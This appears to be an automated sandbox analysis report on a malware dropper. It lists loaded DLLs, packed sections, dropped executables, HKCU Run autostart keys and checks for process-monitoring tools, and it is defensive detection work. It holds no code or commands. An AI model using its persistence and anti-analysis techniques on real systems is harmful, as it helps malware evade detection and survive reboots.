Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: mlang.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 1973248 > 1048576
Source: file.exe Static PE information: Raw size of cqnnvyhp is bigger than: 0x100000 < 0x1b0000
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: d015c0e328.exe, 00000007.00000002.2927972288.0000000006402000.00000040.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2816413833.0000000008340000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cqnnvyhp:EW;zjdghvcx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cqnnvyhp:EW;zjdghvcx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.f40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cqnnvyhp:EW;zjdghvcx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cqnnvyhp:EW;zjdghvcx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.f40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cqnnvyhp:EW;zjdghvcx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cqnnvyhp:EW;zjdghvcx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Unpacked PE file: 7.2.d015c0e328.exe.720000.0.unpack :EW;.rsrc:W;.idata :W; :EW;okzfovcg:EW;ujgghjao:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;okzfovcg:EW;ujgghjao:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Unpacked PE file: 29.2.da69a13142.exe.5a0000.0.unpack :EW;.rsrc:W;.idata :W;lwvfpqpj:EW;nnhflwrw:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Unpacked PE file: 30.2.9b8665be8a.exe.830000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dsxuiljp:EW;oscjiabv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dsxuiljp:EW;oscjiabv:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random[1].exe.6.dr Static PE information: real checksum: 0x1d1a28 should be: 0x1c61e1
Source: random[1].exe2.6.dr Static PE information: real checksum: 0x2aaed0 should be: 0x2b6585
Source: da69a13142.exe.6.dr Static PE information: real checksum: 0x2aaed0 should be: 0x2b6585
Source: 9b8665be8a.exe.6.dr Static PE information: real checksum: 0x1b98b9 should be: 0x1b99e4
Source: d015c0e328.exe.6.dr Static PE information: real checksum: 0x1d1a28 should be: 0x1c61e1
Source: file.exe Static PE information: real checksum: 0x1e72d1 should be: 0x1f0fa5
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1e72d1 should be: 0x1f0fa5
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x1b98b9 should be: 0x1b99e4
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: cqnnvyhp
Source: file.exe Static PE information: section name: zjdghvcx
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: cqnnvyhp
Source: skotes.exe.0.dr Static PE information: section name: zjdghvcx
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: okzfovcg
Source: random[1].exe.6.dr Static PE information: section name: ujgghjao
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: d015c0e328.exe.6.dr Static PE information: section name:
Source: d015c0e328.exe.6.dr Static PE information: section name: .idata
Source: d015c0e328.exe.6.dr Static PE information: section name:
Source: d015c0e328.exe.6.dr Static PE information: section name: okzfovcg
Source: d015c0e328.exe.6.dr Static PE information: section name: ujgghjao
Source: d015c0e328.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: dsxuiljp
Source: random[1].exe0.6.dr Static PE information: section name: oscjiabv
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: 9b8665be8a.exe.6.dr Static PE information: section name:
Source: 9b8665be8a.exe.6.dr Static PE information: section name: .idata
Source: 9b8665be8a.exe.6.dr Static PE information: section name:
Source: 9b8665be8a.exe.6.dr Static PE information: section name: dsxuiljp
Source: 9b8665be8a.exe.6.dr Static PE information: section name: oscjiabv
Source: 9b8665be8a.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: .idata
Source: random[1].exe2.6.dr Static PE information: section name: lwvfpqpj
Source: random[1].exe2.6.dr Static PE information: section name: nnhflwrw
Source: random[1].exe2.6.dr Static PE information: section name: .taggant
Source: da69a13142.exe.6.dr Static PE information: section name:
Source: da69a13142.exe.6.dr Static PE information: section name: .idata
Source: da69a13142.exe.6.dr Static PE information: section name: lwvfpqpj
Source: da69a13142.exe.6.dr Static PE information: section name: nnhflwrw
Source: da69a13142.exe.6.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659CB2D push 03CED6BBh; mov dword ptr [esp], ebx 7_2_0659CFEC
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659BE50 push edi; mov dword ptr [esp], ebx 7_2_0659EB3A
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_065A1642 push edi; mov dword ptr [esp], eax 7_2_065A1655
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659EE45 push eax; mov dword ptr [esp], 3FE6B71Fh 7_2_0659EE46
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659BE1C push ebp; mov dword ptr [esp], edx 7_2_0659C999
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_065A361D push ecx; mov dword ptr [esp], edi 7_2_065A3A70
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_065A361D push ebx; mov dword ptr [esp], eax 7_2_065A3CD5
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_065AB611 push ecx; mov dword ptr [esp], ebx 7_2_065AB616
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_065A1E0A push edi; mov dword ptr [esp], 7BDFC141h 7_2_065A1E0D
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659D638 push eax; mov dword ptr [esp], esi 7_2_0659D63A
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659AE3D push ebp; mov dword ptr [esp], ecx 7_2_0659AE51
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_065A0E2C push edx; mov dword ptr [esp], esi 7_2_065A1708
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659E6C5 push edx; mov dword ptr [esp], 6DFB2FEFh 7_2_0659E6D9
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659E6C5 push esi; mov dword ptr [esp], ecx 7_2_0659E6F6
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659E6C5 push 48C3D7D1h; mov dword ptr [esp], eax 7_2_0659E6FE
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659E6C5 push edi; mov dword ptr [esp], ecx 7_2_0659FD67
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659B6FD push eax; mov dword ptr [esp], ebp 7_2_0659B705
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659B6FD push edx; mov dword ptr [esp], eax 7_2_0659FCE5
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_065A5EFE push ebx; mov dword ptr [esp], esi 7_2_065A5F58
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_065A5EFE push edi; mov dword ptr [esp], 57CE79B3h 7_2_065A5F9E
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659C6FC push ebx; mov dword ptr [esp], ecx 7_2_0659C706
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659AE92 push edx; mov dword ptr [esp], 37D6F8CFh 7_2_0659AE96
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659AE92 push 011521E4h; mov dword ptr [esp], eax 7_2_0659AEC6
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659AE92 push ecx; mov dword ptr [esp], 3B9FA19Ch 7_2_0659AED7
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659CE96 push 6EA7D62Eh; mov dword ptr [esp], eax 7_2_0659DD2F
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_065A0EB3 push 653B72DDh; mov dword ptr [esp], eax 7_2_065A0FDD
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659AF5B push esi; mov dword ptr [esp], ebx 7_2_0659AF62
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659B74D push eax; mov dword ptr [esp], 7FE65571h 7_2_0659B8EF
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659B74D push ebp; mov dword ptr [esp], 41714F53h 7_2_0659DDDE
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_0659DF7E push ecx; mov dword ptr [esp], edi 7_2_065A03B9
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_065A0F6A push 0E580DA4h; mov dword ptr [esp], ebx 7_2_065A20D9
Source: file.exe Static PE information: section name: entropy: 7.9817209633517745
Source: file.exe Static PE information: section name: cqnnvyhp entropy: 7.9536412081511365
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.9817209633517745
Source: skotes.exe.0.dr Static PE information: section name: cqnnvyhp entropy: 7.9536412081511365
Source: random[1].exe.6.dr Static PE information: section name: entropy: 7.9805713763738915
Source: random[1].exe.6.dr Static PE information: section name: okzfovcg entropy: 7.95393650915222
Source: d015c0e328.exe.6.dr Static PE information: section name: entropy: 7.9805713763738915
Source: d015c0e328.exe.6.dr Static PE information: section name: okzfovcg entropy: 7.95393650915222
Source: random[1].exe0.6.dr Static PE information: section name: dsxuiljp entropy: 7.9543105319243335
Source: 9b8665be8a.exe.6.dr Static PE information: section name: dsxuiljp entropy: 7.9543105319243335
Source: random[1].exe2.6.dr Static PE information: section name: entropy: 7.8142055214167545
Source: da69a13142.exe.6.dr Static PE information: section name: entropy: 7.8142055214167545
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9b8665be8a.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run da69a13142.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d015c0e328.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 36321ea525.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
